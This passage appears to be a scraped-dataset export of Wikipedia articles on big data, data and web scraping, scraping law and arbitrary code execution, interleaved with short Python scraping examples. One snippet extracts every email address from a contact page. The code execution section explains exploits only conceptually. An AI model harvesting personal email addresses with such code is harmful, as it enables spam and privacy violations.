academics and other stakeholders in discussing big data issues. The project aims to define a strategy in terms of research and innovation to guide supporting actions from the European Commission in the successful implementation of the big data economy. Outcomes of this project will be used as input for Horizon 2020, their next framework program. 186 The British government announced in March 2014 the founding of the Alan Turing Institute, named after the computer pioneer and code-breaker, which will focus on new ways to collect and analyze large data sets. 187 At the University of Waterloo Stratford Campus Canadian Open Data Experience (CODE) Inspiration Day, participants demonstrated how using data visualization can increase the understanding and appeal of big data sets and communicate their story to the world. 
188 Computational social sciences: Anyone can use application programming interfaces (APIs) provided by big data holders, such as Google and Twitter, to do research in the social and behavioral sciences. 189 Often these APIs are provided for free. 189 Tobias Preis et al. used Google Trends data to demonstrate that Internet users from countries with a higher per capita gross domestic product (GDP) are more likely to search for information about the future than information about the past. The findings suggest there may be a link between online behaviors and real-world economic indicators. 190 191 192 The authors of the study examined Google query logs, computing the ratio of the volume of searches for the coming year (2011) to the volume of searches for the previous year (2009), which they call the "future orientation index". 193 They compared the future orientation index to the per capita GDP of each country, and found a strong tendency for countries where Google users inquire more about the future to have a higher GDP. Tobias Preis and his colleagues Helen Susannah Moat and H. Eugene Stanley introduced a method to identify online precursors for stock market moves, using trading strategies based on search volume data provided by Google Trends. 194 Their analysis of Google search volume for 98 terms of varying financial relevance, published in Scientific Reports, 195 suggests that increases in search volume for financially relevant search terms tend to precede large losses in financial markets. 196 197 198 199 200 201 202 Big data sets come with algorithmic challenges that previously did not exist. Hence, some see a need to fundamentally change the way data is processed. 203 A research question that is asked about big data sets is whether it is necessary to look at the full data to draw certain conclusions about the properties of the data or whether a sample is good enough. The name big data itself contains a term related to size, and this is an important characteristic of big data. But sampling enables the selection of the right data points from within the larger data set to estimate the characteristics of the whole population. In manufacturing, different types of sensory data, such as acoustics, vibration, pressure, current, voltage, and controller data, are available at short time intervals. To predict downtime it may not be necessary to look at all the data; a sample may be sufficient. Big data can be broken down by various data point categories such as demographic, psychographic, behavioral, and transactional data. With large sets of data points, marketers are able to create and use more customized segments of consumers for more strategic targeting. Critiques of the big data paradigm come in two flavors: those that question the implications of the approach itself, and those that question the way it is currently done. 204 One approach to this criticism is the field of critical data studies. "A crucial problem is that we do not know much about the underlying empirical micro-processes that lead to the emergence of these typical network characteristics of Big Data." 25 In their critique, Snijders, Matzat, and Reips point out that often very strong assumptions are made about mathematical properties that may not at all reflect what is really going on at the level of micro-processes. 
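The "future orientation index" mentioned above is just a ratio of two search volumes; a toy computation with made-up numbers (not the study's actual data) could look like this:

# Hypothetical Google Trends-style volumes for one country in 2010.
searches_for_2011 = 1200  # queries mentioning the coming year
searches_for_2009 = 800   # queries mentioning the previous year

future_orientation_index = searches_for_2011 / searches_for_2009
print(f"Future orientation index: {future_orientation_index:.2f}")  # 1.50 for these numbers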
Mark Graham has leveled broad critiques at Chris Anderson's assertion that big data will spell the end of theory, 205 focusing in particular on the notion that big data must always be contextualized in its social, economic, and political contexts. 206 Even as companies invest eight- and nine-figure sums to derive insight from information streaming in from suppliers and customers, less than 40% of employees have sufficiently mature processes and skills to do so. To overcome this insight deficit, big data, no matter how comprehensive or well analyzed, must be complemented by "big judgment", according to an article in the Harvard Business Review. 207 Much in the same line, it has been pointed out that the decisions based on the analysis of big data are inevitably "informed by the world as it was in the past, or, at best, as it currently is". 67 Fed by a large amount of data on past experiences, algorithms can predict future developments if the future is similar to the past. 208 If the dynamics of the system change in the future (if it is not a stationary process), the past can say little about the future. In order to make predictions in changing environments, it would be necessary to have a thorough understanding of the system's dynamics, which requires theory. 208 As a response to this critique, Alemany Oliver and Vayre suggest using "abductive reasoning as a first step in the research process in order to bring context to consumers' digital traces and make new theories emerge". 209 Additionally, it has been suggested to combine big data approaches with computer simulations, such as agent-based models 67 and complex systems. Agent-based models are increasingly getting better at predicting the outcome of social complexities of even unknown future scenarios through computer simulations that are based on a collection of mutually interdependent algorithms. 210 211 Finally, the use of multivariate methods that probe for the latent structure of the data, such as factor analysis and cluster analysis, has proven useful as an analytic approach that goes well beyond the bivariate approaches (e.g., contingency tables) typically employed with smaller data sets. In health and biology, conventional scientific approaches are based on experimentation. For these approaches, the limiting factor is the relevant data that can confirm or refute the initial hypothesis. 212 A new postulate is accepted now in biosciences: the information provided by the data in huge volumes (omics) without prior hypothesis is complementary and sometimes necessary to conventional approaches based on experimentation. 213 214 In the massive approaches it is the formulation of a relevant hypothesis to explain the data that is the limiting factor. 215 The search logic is reversed and the limits of induction ("Glory of Science and Philosophy scandal", C. D. Broad, 1926) are to be considered. Privacy advocates are concerned about the threat to privacy represented by increasing storage and integration of personally identifiable information; expert panels have released various policy recommendations to conform practice to expectations of privacy. 216 The misuse of big data in several cases by media, companies, and even the government has contributed to an erosion of trust in almost every fundamental institution holding up society. 
217 Barocas and Nissenbaum argue that one way of protecting individual users is by being informed about the types of information being collected, with whom it is shared, under what constraints and for what purposes. 218 The "V" model of big data is concerning as it centers on computational scalability and loses sight of the perceptibility and understandability of information. This led to the framework of cognitive big data, which characterizes big data applications according to: 219 Large data sets have been analyzed by computing machines for well over a century, including the US census analytics performed by IBM's punch-card machines which computed statistics including means and variances of populations across the whole continent. In more recent decades, science experiments such as CERN have produced data on similar scales to current commercial "big data". However, science experiments have tended to analyze their data using specialized custom-built high-performance computing (super-computing) clusters and grids, rather than clouds of cheap commodity computers as in the current commercial wave, implying a difference in both culture and technology stack. Ulf-Dietrich Reips and Uwe Matzat wrote in 2014 that big data had become a "fad" in scientific research. 189 Researcher Danah Boyd has raised concerns that the use of big data in science can neglect principles such as choosing a representative sample, out of excessive concern with handling the huge amounts of data. 220 This approach may lead to results that are biased in one way or another. 221 Integration across heterogeneous data resources—some that might be considered big data and others not—presents formidable logistical as well as analytical challenges, but many researchers argue that such integrations are likely to represent the most promising new frontiers in science. 222 In the provocative article "Critical Questions for Big Data", 223 the authors describe big data as a part of mythology: "large data sets offer a higher form of intelligence and knowledge ... , with the aura of truth, objectivity, and accuracy". Users of big data are often "lost in the sheer volume of numbers", and "working with Big Data is still subjective, and what it quantifies does not necessarily have a closer claim on objective truth". 223 Recent developments in the BI domain, such as pro-active reporting, especially target improvements in the usability of big data through automated filtering of non-useful data and correlations. 224 Big structures are full of spurious correlations, 225 whether because of non-causal coincidences (the law of truly large numbers), the nature of big randomness 226 (Ramsey theory), or the existence of non-included factors, so the hope of early experimenters that large databases of numbers would "speak for themselves" and revolutionize the scientific method is questioned. 227 Catherine Tucker has pointed to "hype" around big data, writing "By itself, big data is unlikely to be valuable." The article explains: "The many contexts where data is cheap relative to the cost of retaining talent to process it suggest that processing skills are more important than data itself in creating value for a firm." 228 Big data analysis is often shallow compared to analysis of smaller data sets. 229 In many big data projects, there is no large data analysis happening, but the challenge is the extract, transform, load part of data pre-processing. 
229 Big data is a buzzword and a "vague term", 230 231 but at the same time an "obsession" 231 with entrepreneurs, consultants, scientists, and the media. Big data showcases such as Google Flu Trends failed to deliver good predictions in recent years, overstating the flu outbreaks by a factor of two. Similarly, Academy awards and election predictions solely based on Twitter were more often off than on target. Big data often poses the same challenges as small data; adding more data does not solve problems of bias, but may emphasize other problems. In particular data sources such as Twitter are not representative of the overall population, and results drawn from such sources may then lead to wrong conclusions. Google Translate—which is based on big data statistical analysis of text—does a good job at translating web pages. However, results from specialized domains may be dramatically skewed. On the other hand, big data may also introduce new problems, such as the multiple comparisons problem: simultaneously testing a large set of hypotheses is likely to produce many false results that mistakenly appear significant. Ioannidis argued that "most published research findings are false" 232 due to essentially the same effect: when many scientific teams and researchers each perform many experiments (i.e. process a big amount of scientific data; although not with big data technology), the likelihood of a "significant" result being false grows fast even more so, when only positive results are published. Furthermore, big data analytics results are only as good as the model on which they are predicated. In an example, big data took part in attempting to predict the results of the 2016 U.S. presidential election 233 with varying degrees of success. Big data has been used in policing and surveillance by institutions like law enforcement and corporations. 234 Due to the less visible nature of data-based surveillance as compared to traditional methods of policing, objections to big data policing are less likely to arise. According to Sarah Brayne's Big Data Surveillance: The Case of Policing, 235 big data policing can reproduce existing societal inequalities in three ways: If these potential problems are not corrected or regulated, the effects of big data policing may continue to shape societal hierarchies. Conscientious usage of big data policing could prevent individual level biases from becoming institutional biases, Brayne also notes. |
73 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-11 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion in calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
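The bitmap-plus-OCR technique mentioned above can be sketched with the pytesseract wrapper around the Tesseract engine; this sketch assumes Tesseract and Pillow are installed, and the screenshot path is a placeholder:

from PIL import Image
import pytesseract  # requires the Tesseract OCR engine to be installed separately

# Placeholder path to a captured screen image (for example, a terminal emulator screenshot).
screenshot = Image.open("captured_screen.png")

# Run OCR over the bitmap to recover the on-screen text for further parsing.
recovered_text = pytesseract.image_to_string(screenshot)
print(recovered_text)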
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
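Report mining as described in the entry above can be as simple as parsing a spooled text report with regular expressions; a minimal sketch follows, with an invented report layout used purely for illustration:

import re
import pandas as pd

# A human-readable report captured (spooled) to a text file instead of sent to a printer.
report = """\
INVOICE 1001   2024-01-05   $1,250.00
INVOICE 1002   2024-01-09   $980.50
"""

# One pattern per report line: invoice number, ISO date, amount.
pattern = re.compile(r"INVOICE\s+(\d+)\s+(\d{4}-\d{2}-\d{2})\s+\$([\d,]+\.\d{2})")
rows = [match.groups() for match in pattern.finditer(report)]

# Load the extracted fields into a table for offline analysis.
df = pd.DataFrame(rows, columns=["invoice", "date", "amount"])
print(df)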
74 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-24 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
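As a small illustration of the fetch-then-extract workflow described above (the URL and the choice of elements are placeholders, not a recommendation for any particular site):

import requests
from bs4 import BeautifulSoup
import pandas as pd

url = "https://example.com/listings"              # placeholder page to fetch
resp = requests.get(url, timeout=10)              # fetching: download the page
soup = BeautifulSoup(resp.text, "html.parser")    # extraction: parse the HTML

# Collect the text and target of every link as a stand-in for the data of interest.
rows = [{"text": a.get_text(strip=True), "href": a.get("href")} for a in soup.find_all("a")]

# Load the extracted data into a spreadsheet-friendly file for later analysis.
pd.DataFrame(rows).to_csv("scraped_links.csv", index=False)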
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a common URL scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as XPath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical, and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the long tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformats do, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Some approaches use advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
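The grep/regular-expression approach mentioned at the start of this passage can be sketched in a few lines of Python; the page and the pattern (email addresses) are purely illustrative:

import re
import requests

# Placeholder page; any HTML string would do for the regex step.
html = requests.get("https://example.com/contact", timeout=10).text

# Grep-style extraction: pull every email-like string straight out of the raw markup.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)
print(sorted(set(emails)))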
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
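The scraped article above walks through the standard pipeline: fetch a page over HTTP, parse it into a DOM, and pull out the pieces you want. It also ends by noting that site administrators use measures to stop or slow bots. The following is a minimal sketch of that fetch-and-extract step using requests and BeautifulSoup together with Python's standard urllib.robotparser; the target URL, User-Agent string, and 5-second delay are illustrative assumptions, not part of the scraper used in this notebook.
# Minimal sketch of a polite fetch-and-extract step (illustrative only).
# The URL, User-Agent string, and 5-second delay below are example values.
import time
from urllib import robotparser
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup

def polite_fetch(url, user_agent="example-scraper/0.1", delay=5):
    # Fetch a page only if the site's robots.txt permits it, then pause.
    parts = urlparse(url)
    rp = robotparser.RobotFileParser()
    rp.set_url(f"{parts.scheme}://{parts.netloc}/robots.txt")
    rp.read()
    if not rp.can_fetch(user_agent, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    response = requests.get(url, headers={"User-Agent": user_agent}, timeout=10)
    response.raise_for_status()
    time.sleep(delay)  # throttle so repeated calls do not hammer the server
    return response.text

def extract_paragraphs(html):
    # Parse the HTML into a DOM tree and return the text of each paragraph.
    soup = BeautifulSoup(html, "html5lib")
    return [p.get_text(" ", strip=True) for p in soup.find_all("p")]

# Example (hypothetical target page):
# paragraphs = extract_paragraphs(polite_fetch("https://en.wikipedia.org/wiki/Web_scraping"))
Checking robots.txt and sleeping between requests is exactly the kind of courtesy that helps a crawler avoid the blocking measures the scraped article describes.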
77 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Arbitrary_code_execution | In computer security, arbitrary code execution (ACE) is an attacker's ability to run any commands or code of the attacker's choice on a target machine or in a target process. 1 An arbitrary code execution vulnerability is a security flaw in software or hardware allowing arbitrary code execution. A program that is designed to exploit such a vulnerability is called an arbitrary code execution exploit. The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE or RCX). Arbitrary code execution signifies that if someone sends a specially designed set of data to a computer, they can make it do whatever they want. Even though this particular weakness may not cause actual problems in the real world, researchers have discussed whether it suggests a natural tendency for computers to have vulnerabilities that allow unauthorized code execution. 2 There are a number of classes of vulnerability that can lead to an attacker's ability to execute arbitrary commands or code. For example: Arbitrary code execution is commonly achieved through control over the instruction pointer (such as a jump or a branch) of a running process. The instruction pointer points to the next instruction in the process that will be executed. Control over the value of the instruction pointer therefore gives control over which instruction is executed next. In order to execute arbitrary code, many exploits inject code into the process (for example by sending input to it which gets stored in an input buffer in RAM) and use a vulnerability to change the instruction pointer to have it point to the injected code. The injected code will then automatically get executed. This type of attack exploits the fact that most computers (which use a Von Neumann architecture) do not make a general distinction between code and data, 7 8 so that malicious code can be camouflaged as harmless input data. Many newer CPUs have mechanisms to make this harder, such as a no-execute bit. 9 10 On its own, an arbitrary code execution exploit will give the attacker the same privileges as the target process that is vulnerable. 11 For example, if exploiting a flaw in a web browser, an attacker could act as the user, performing actions such as modifying personal computer files or accessing banking information, but would not be able to perform system-level actions (unless the user in question also had that access). To work around this, once an attacker can execute arbitrary code on a target, there is often an attempt at a privilege escalation exploit in order to gain additional control. This may involve the kernel itself or an account such as Administrator, SYSTEM, or root. With or without this enhanced control, exploits have the potential to do severe damage or turn the computer into a zombie—but privilege escalation helps with hiding the attack from the legitimate administrator of the system. Retrogaming hobbyists have managed to find vulnerabilities in classic video games that allow them to execute arbitrary code, usually using a precise sequence of button inputs in a tool-assisted superplay to cause a buffer overflow, 